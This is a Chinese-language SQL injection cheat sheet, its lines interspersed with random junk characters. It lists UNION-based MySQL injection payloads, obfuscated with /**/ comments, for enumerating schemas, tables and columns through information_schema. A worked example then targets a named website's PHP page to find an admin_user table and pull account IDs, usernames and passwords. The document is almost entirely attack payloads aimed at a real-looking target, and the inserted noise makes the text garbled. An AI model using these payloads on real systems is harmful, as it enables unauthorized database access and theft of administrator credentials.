查库. r. R0 p0 v9 b$ i# R8 k
# T9 R# g: w) M! I) O* t& z' a
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*7 ~% @* g) d- r5 u5 m' u
' F3 y% h) c( ~) O( `) q
查表, h' |& V7 w. w2 m" u4 _. ~ _
% ~* N( W7 ?" ~& B
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
0 ?% S; `0 ^, j! z& v. a# e: [5 [2 `" o& d2 i8 W5 y k
查段
/ L- f# I r* Y5 X h* u$ ]+ |+ L: d5 w; |! H
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1: J0 @+ u; k' B7 @* Z9 E3 }2 n+ N
' P4 w6 g1 h: o- M. ?
! b( G4 w9 Z5 \. v, omysql5高级注入方法暴表; n1 i* j* r3 v$ E1 }- `& M
% @" u+ s1 {* j( U" L2 z
例子如下:7 ]8 K0 D" Q1 D8 z/ {
& Y6 {7 \9 G, e- J" U" r7 Z# ]
1.爆表
% K: n) ~' P$ Q9 G# D$ ?" thttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
! M4 N2 Z- `$ u" A+ w& a5 d/ J这样爆到第4个时出现了admin_user表。
+ g) T$ B! L) G9 t. C/ r% t7 s' Y
2.暴字段
$ T$ `4 B6 e" m/ v9 R. `http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*0 r* z `- e* d" C. F
7 j; v2 E/ _* Y* _3 k/ `; K5 v9 w6 Z
/ V. F, W" y$ _$ z; q; I1 [3.爆密码
: s! \# f5 Y$ o2 j6 i1 h/ |http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
' ?) v* o9 f2 V) v7 r7 A6 y1 Z) X! `4 w* ^
^; D4 H4 N B
|